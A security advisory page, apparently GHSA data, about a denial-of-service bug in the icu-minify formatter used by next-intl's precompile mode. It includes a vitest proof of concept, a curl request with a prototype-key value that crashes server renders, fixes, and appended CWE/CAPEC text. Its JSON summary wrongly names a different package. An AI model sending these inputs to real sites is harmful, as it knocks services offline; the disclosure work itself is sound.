const options: SelectOptions = {}; // <-- plain object, inherits from Object.prototype
for (const [key, option] of Object.entries(node.options)) {
options[key] = compileNodesToNode(option.value);
}
return [node.value, TYPE_SELECT, options];
}
At runtime, the formatter looks up the user-controllable value directly on that object:
// packages/icu-minify/src/format.tsx:226-244
function formatSelect<RichTextElement>(
name: string,
options: SelectOptions,
locale: string,
values: FormatValues<RichTextElement>,
formatOptions: FormatOptions,
pluralCtx: PluralContext | undefined
): string | RichTextElement | Array<string | RichTextElement> {
const value = String(getValue(values, name)); // 234: coerce to string, no sanitization
const branch: CompiledNode | undefined = options[value] ?? options.other; // 235: unsafe lookup
if (process.env.NODE_ENV !== 'production' && !branch) {
throw new Error(
`No matching branch for select "${name}" with value "${value}"`
);
}
return formatBranch(branch, locale, values, formatOptions, pluralCtx); // 243
}
Because options inherits from Object.prototype, lookups such as options['toString'] return Object.prototype.toString — a truthy Function. The ?? options.other fallback is therefore skipped, and the non-array, non-string branch is passed to formatBranch, which forwards it to formatNodes:
// packages/icu-minify/src/format.tsx:286-308
function formatBranch<RichTextElement>(
branch: CompiledNode,
/* … */
) {
if (typeof branch === 'string') return branch; // string: fine
if (branch === TYPE_POUND) return formatNode(/* … */); // pound: fine
return formatNodes(branch as Array<CompiledNode>, /* … */); // 301: Function is not iterable
}
// packages/icu-minify/src/format.tsx:73-92
function formatNodes<RichTextElement>(
nodes: Array<CompiledNode>,
/* … */
): Array<string | RichTextElement> {
const result: Array<string | RichTextElement> = [];
for (const node of nodes) { // 82: TypeError: nodes is not iterable
/* … */
}
return result;
}
Five bare-prototype keys reliably crash the formatter in production: toString, __proto__, constructor, hasOwnProperty, valueOf (plus propertyIsEnumerable, isPrototypeOf, toLocaleString). Note the development branch at line 237 (throw new Error('No matching branch for select …')) is bypassed because the inherited function is truthy — so this is not masked in development either.
Why formatPlural is not affected
formatPlural (format.tsx:246-284) looks safe for two independent reasons and does not need to be patched for this specific bug:
- Exact-match keys use the
=${value}prefix (exactKey = '=' + value, line 263), so the attacker would need to supply e.g.=toString, which is not a member ofObject.prototype. - The category branch uses
formatOptions.formatters.getPluralRules(locale, {type}).select(value)which returns a fixed enum (zero|one|two|few|many|other), never attacker-supplied.
The bug is specific to the select path where the raw string value is used as the lookup key.
Reachability
- Direct consumers of
icu-minify: any code callingformat(compiled, locale, values, …)wherevalues[arg]for aselectplaceholder comes from user input is vulnerable with no additional preconditions. next-intlusers who enableexperimental.messages.precompile(packages/next-intl/src/plugin/types.tsx:24, wired inpackages/next-intl/src/plugin/getNextConfig.tsx:177-293): the runtime atpackages/use-intl/src/core/format-message/format-only.tsxforwards directly toicu-minify/format, sot('msg', {role: req.query.role})against a{role, select, admin {…} other {…}}message crashes the render.
No middleware, type guard, escaping, or framework default stands between user input and the unsafe lookup — values reaches format() unmodified.
PoC
Verified dynamically against packages/icu-minify/src/format.tsx at commit b4aa538 (v4.9.1) with vitest and NODE_ENV=production.
Reproduction (drop into packages/icu-minify/test/poc.test.ts and run pnpm exec vitest run test/poc.test.ts):
import {describe, expect, it} from 'vitest';
import compile from '../src/compile.js';
import format, {type FormatOptions} from '../src/format.js';
const formatters: FormatOptions['formatters'] = {
getDateTimeFormat: (...a) => new Intl.DateTimeFormat(...a),
getNumberFormat: (...a) => new Intl.NumberFormat(...a),
getPluralRules: (...a) => new Intl.PluralRules(...a)
};
describe('select prototype-key DoS', () => {
const compiled = compile('{role, select, admin {Admin} user {User} other {Guest}}');
for (const key of ['toString', '__proto__', 'constructor', 'hasOwnProperty', 'valueOf']) {
it(`crashes on role="${key}"`, () => {
process.env.NODE_ENV = 'production';
expect(() => format(compiled, 'en', {role: key}, {formatters}))
.toThrow(TypeError); // "nodes is not iterable"
});
}
});
Observed output (each of the 5 keys):
TypeError: nodes is not iterable
at formatNodes (packages/icu-minify/src/format.tsx:82:22)
at formatBranch (packages/icu-minify/src/format.tsx:301:10)
at formatSelect (packages/icu-minify/src/format.tsx:243:10)
at formatNode (packages/icu-minify/src/format.tsx:150:14)
at formatNodes (packages/icu-minify/src/format.tsx:83:23)
at format (packages/icu-minify/src/format.tsx:64:18)
End-to-end Next.js scenario (illustrative — any attacker-controlled role/status/type/gender forwarded into a select placeholder triggers the same exception inside the server render):
// app/[locale]/profile/page.tsx — assume precompile enabled
export default async function Page({searchParams}: {searchParams: Promise<{role?: string}>}) {
const t = await getTranslations('Profile');
const {role = 'other'} = await searchParams;
return <h1>{t('greeting', {role})}</h1>;
// ^^^^^ messages: { "greeting": "{role, select, admin {Hi admin} other {Hi}}" }
}
curl -i 'https://target.example/en/profile?role=toString'
HTTP/1.1 500 Internal Server Error
Impact
- Availability: An unauthenticated attacker can force a 500 response on any page or API route that formats a
selectICU message using user-controllable input. Each request fails independently; there is no persistent state corruption or amplification beyond the malicious request. - Confidentiality / Integrity: None. No data is leaked and no prototype write occurs — this is a prototype-chain read confusion, not a prototype pollution write.
- Scope: Any consumer of
icu-minifythat passes user input into aselectbranch is vulnerable.next-intlusers are only exposed if they have opted into the experimentalexperimental.messages.precompileflag. - Preconditions: Developer must forward untrusted input to a
{arg, select, …}placeholder. This is a routine pattern (role,status,gender,type) and the library offers no documentation warning thatselectkeys must be validated against prototype members.
Recommended Fix
Either of the following (defense-in-depth suggests both). Both are one-line, minimal-churn fixes.
- Use a null-prototype map in
compileSelect(and symmetrically incompilePlural) so that noObject.prototypekeys can ever be resolved:
// packages/icu-minify/src/compile.tsx
function compileSelect(node: SelectElement): CompiledNode {
- const options: SelectOptions = {};
+ const options: SelectOptions = Object.create(null);
for (const [key, option] of Object.entries(node.options)) {
options[key] = compileNodesToNode(option.value);
}
return [node.value, TYPE_SELECT, options];
}
- Gate the runtime lookup with
Object.prototype.hasOwnProperty.callso theotherfallback is reached for any non-own key:
// packages/icu-minify/src/format.tsx
function formatSelect<RichTextElement>(/* … */) {
const value = String(getValue(values, name));
- const branch: CompiledNode | undefined = options[value] ?? options.other;
+ const branch: CompiledNode | undefined =
+ Object.prototype.hasOwnProperty.call(options, value) ? options[value] : options.other;
/* … */
}
Option 1 is preferable because it also survives future serialization round-trips (e.g. JSON-hydrated compiled messages) and removes the hazard at the source. Option 2 is a defensive backstop for any code path that constructs SelectOptions from arbitrary JSON at runtime.
No regression is expected in tests — compileSelect never reads back through the prototype chain, and all existing lookups use own properties.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.9.1"
},
"package": {
"ecosystem": "npm",
"name": "icu-minify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T17:32:01Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "## Summary\n\n`icu-minify`\u0027s runtime formatter resolves `select` branches by looking up the runtime value as a plain property on a prototype-bearing object. When the value coerces to a key that exists on `Object.prototype` (e.g. `toString`, `__proto__`, `constructor`, `hasOwnProperty`, `valueOf`), the lookup returns a truthy value that short-circuits the `?? options.other` fallback, and the downstream iterator crashes with `TypeError: nodes is not iterable`. Any consumer that forwards user input into a `{arg, select, \u2026}` placeholder \u2014 a common idiom for `role`, `status`, `type`, `gender` \u2014 can be crashed per-request by supplying one of those keys. In Next.js SSR (via `next-intl` with `experimental.messages.precompile`) this yields a 500 for the affected render.\n\n## Details\n\n### Vulnerable code paths\n\nCompilation produces a plain object whose prototype chain includes all `Object.prototype` members:\n\n```tsx\n// packages/icu-minify/src/compile.tsx:191-199\nfunction compileSelect(node: SelectElement): CompiledNode {\n const options: SelectOptions = {}; // \u003c-- plain object, inherits from Object.prototype\n\n for (const [key, option] of Object.entries(node.options)) {\n options[key] = compileNodesToNode(option.value);\n }\n\n return [node.value, TYPE_SELECT, options];\n}\n```\n\nAt runtime, the formatter looks up the user-controllable value directly on that object:\n\n```tsx\n// packages/icu-minify/src/format.tsx:226-244\nfunction formatSelect\u003cRichTextElement\u003e(\n name: string,\n options: SelectOptions,\n locale: string,\n values: FormatValues\u003cRichTextElement\u003e,\n formatOptions: FormatOptions,\n pluralCtx: PluralContext | undefined\n): string | RichTextElement | Array\u003cstring | RichTextElement\u003e {\n const value = String(getValue(values, name)); // 234: coerce to string, no sanitization\n const branch: CompiledNode | undefined = options[value] ?? options.other; // 235: unsafe lookup\n\n if (process.env.NODE_ENV !== \u0027production\u0027 \u0026\u0026 !branch) {\n throw new Error(\n `No matching branch for select \"${name}\" with value \"${value}\"`\n );\n }\n\n return formatBranch(branch, locale, values, formatOptions, pluralCtx); // 243\n}\n```\n\nBecause `options` inherits from `Object.prototype`, lookups such as `options[\u0027toString\u0027]` return `Object.prototype.toString` \u2014 a truthy `Function`. The `?? options.other` fallback is therefore skipped, and the non-array, non-string branch is passed to `formatBranch`, which forwards it to `formatNodes`:\n\n```tsx\n// packages/icu-minify/src/format.tsx:286-308\nfunction formatBranch\u003cRichTextElement\u003e(\n branch: CompiledNode,\n /* \u2026 */\n) {\n if (typeof branch === \u0027string\u0027) return branch; // string: fine\n if (branch === TYPE_POUND) return formatNode(/* \u2026 */); // pound: fine\n return formatNodes(branch as Array\u003cCompiledNode\u003e, /* \u2026 */); // 301: Function is not iterable\n}\n\n// packages/icu-minify/src/format.tsx:73-92\nfunction formatNodes\u003cRichTextElement\u003e(\n nodes: Array\u003cCompiledNode\u003e,\n /* \u2026 */\n): Array\u003cstring | RichTextElement\u003e {\n const result: Array\u003cstring | RichTextElement\u003e = [];\n for (const node of nodes) { // 82: TypeError: nodes is not iterable\n /* \u2026 */\n }\n return result;\n}\n```\n\nFive bare-prototype keys reliably crash the formatter in production: `toString`, `__proto__`, `constructor`, `hasOwnProperty`, `valueOf` (plus `propertyIsEnumerable`, `isPrototypeOf`, `toLocaleString`). Note the development branch at line 237 (`throw new Error(\u0027No matching branch for select \u2026\u0027)`) is bypassed because the inherited function is truthy \u2014 so this is not masked in development either.\n\n### Why `formatPlural` is not affected\n\n`formatPlural` (format.tsx:246-284) looks safe for two independent reasons and does not need to be patched for this specific bug:\n\n1. Exact-match keys use the `=${value}` prefix (`exactKey = \u0027=\u0027 + value`, line 263), so the attacker would need to supply e.g. `=toString`, which is not a member of `Object.prototype`.\n2. The category branch uses `formatOptions.formatters.getPluralRules(locale, {type}).select(value)` which returns a fixed enum (`zero|one|two|few|many|other`), never attacker-supplied.\n\nThe bug is specific to the `select` path where the raw string value is used as the lookup key.\n\n### Reachability\n\n- **Direct consumers of `icu-minify`**: any code calling `format(compiled, locale, values, \u2026)` where `values[arg]` for a `select` placeholder comes from user input is vulnerable with no additional preconditions.\n- **`next-intl` users** who enable `experimental.messages.precompile` (`packages/next-intl/src/plugin/types.tsx:24`, wired in `packages/next-intl/src/plugin/getNextConfig.tsx:177-293`): the runtime at `packages/use-intl/src/core/format-message/format-only.tsx` forwards directly to `icu-minify/format`, so `t(\u0027msg\u0027, {role: req.query.role})` against a `{role, select, admin {\u2026} other {\u2026}}` message crashes the render.\n\nNo middleware, type guard, escaping, or framework default stands between user input and the unsafe lookup \u2014 `values` reaches `format()` unmodified.\n\n## PoC\n\nVerified dynamically against `packages/icu-minify/src/format.tsx` at commit `b4aa538` (v4.9.1) with vitest and `NODE_ENV=production`.\n\nReproduction (drop into `packages/icu-minify/test/poc.test.ts` and run `pnpm exec vitest run test/poc.test.ts`):\n\n```ts\nimport {describe, expect, it} from \u0027vitest\u0027;\nimport compile from \u0027../src/compile.js\u0027;\nimport format, {type FormatOptions} from \u0027../src/format.js\u0027;\n\nconst formatters: FormatOptions[\u0027formatters\u0027] = {\n getDateTimeFormat: (...a) =\u003e new Intl.DateTimeFormat(...a),\n getNumberFormat: (...a) =\u003e new Intl.NumberFormat(...a),\n getPluralRules: (...a) =\u003e new Intl.PluralRules(...a)\n};\n\ndescribe(\u0027select prototype-key DoS\u0027, () =\u003e {\n const compiled = compile(\u0027{role, select, admin {Admin} user {User} other {Guest}}\u0027);\n\n for (const key of [\u0027toString\u0027, \u0027__proto__\u0027, \u0027constructor\u0027, \u0027hasOwnProperty\u0027, \u0027valueOf\u0027]) {\n it(`crashes on role=\"${key}\"`, () =\u003e {\n process.env.NODE_ENV = \u0027production\u0027;\n expect(() =\u003e format(compiled, \u0027en\u0027, {role: key}, {formatters}))\n .toThrow(TypeError); // \"nodes is not iterable\"\n });\n }\n});\n```\n\nObserved output (each of the 5 keys):\n\n```\nTypeError: nodes is not iterable\n at formatNodes (packages/icu-minify/src/format.tsx:82:22)\n at formatBranch (packages/icu-minify/src/format.tsx:301:10)\n at formatSelect (packages/icu-minify/src/format.tsx:243:10)\n at formatNode (packages/icu-minify/src/format.tsx:150:14)\n at formatNodes (packages/icu-minify/src/format.tsx:83:23)\n at format (packages/icu-minify/src/format.tsx:64:18)\n```\n\nEnd-to-end Next.js scenario (illustrative \u2014 any attacker-controlled `role`/`status`/`type`/`gender` forwarded into a `select` placeholder triggers the same exception inside the server render):\n\n```tsx\n// app/[locale]/profile/page.tsx \u2014 assume precompile enabled\nexport default async function Page({searchParams}: {searchParams: Promise\u003c{role?: string}\u003e}) {\n const t = await getTranslations(\u0027Profile\u0027);\n const {role = \u0027other\u0027} = await searchParams;\n return \u003ch1\u003e{t(\u0027greeting\u0027, {role})}\u003c/h1\u003e;\n // ^^^^^ messages: { \"greeting\": \"{role, select, admin {Hi admin} other {Hi}}\" }\n}\n```\n\n```\ncurl -i \u0027https://target.example/en/profile?role=toString\u0027\nHTTP/1.1 500 Internal Server Error\n```\n\n## Impact\n\n- **Availability**: An unauthenticated attacker can force a 500 response on any page or API route that formats a `select` ICU message using user-controllable input. Each request fails independently; there is no persistent state corruption or amplification beyond the malicious request.\n- **Confidentiality / Integrity**: None. No data is leaked and no prototype write occurs \u2014 this is a prototype-chain *read* confusion, not a prototype pollution write.\n- **Scope**: Any consumer of `icu-minify` that passes user input into a `select` branch is vulnerable. `next-intl` users are only exposed if they have opted into the experimental `experimental.messages.precompile` flag.\n- **Preconditions**: Developer must forward untrusted input to a `{arg, select, \u2026}` placeholder. This is a routine pattern (`role`, `status`, `gender`, `type`) and the library offers no documentation warning that `select` keys must be validated against prototype members.\n\n## Recommended Fix\n\nEither of the following (defense-in-depth suggests both). Both are one-line, minimal-churn fixes.\n\n1. Use a null-prototype map in `compileSelect` (and symmetrically in `compilePlural`) so that no `Object.prototype` keys can ever be resolved:\n\n```tsx\n// packages/icu-minify/src/compile.tsx\nfunction compileSelect(node: SelectElement): CompiledNode {\n- const options: SelectOptions = {};\n+ const options: SelectOptions = Object.create(null);\n\n for (const [key, option] of Object.entries(node.options)) {\n options[key] = compileNodesToNode(option.value);\n }\n\n return [node.value, TYPE_SELECT, options];\n }\n```\n\n2. Gate the runtime lookup with `Object.prototype.hasOwnProperty.call` so the `other` fallback is reached for any non-own key:\n\n```tsx\n// packages/icu-minify/src/format.tsx\n function formatSelect\u003cRichTextElement\u003e(/* \u2026 */) {\n const value = String(getValue(values, name));\n- const branch: CompiledNode | undefined = options[value] ?? options.other;\n+ const branch: CompiledNode | undefined =\n+ Object.prototype.hasOwnProperty.call(options, value) ? options[value] : options.other;\n /* \u2026 */\n }\n```\n\nOption 1 is preferable because it also survives future serialization round-trips (e.g. JSON-hydrated compiled messages) and removes the hazard at the source. Option 2 is a defensive backstop for any code path that constructs `SelectOptions` from arbitrary JSON at runtime.\n\nNo regression is expected in tests \u2014 `compileSelect` never reads back through the prototype chain, and all existing lookups use own properties.",
"id": "GHSA-r27j-894h-3w3p",
"modified": "2026-05-06T17:32:01Z",
"published": "2026-05-06T17:32:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/amannn/next-intl/security/advisories/GHSA-r27j-894h-3w3p"
},
{
"type": "PACKAGE",
"url": "https://github.com/amannn/next-intl"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "mcp-data-vis vulnerable to denial of service via unsanitized `select` key lookup on `Object.prototype` with `precompile: true`"
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.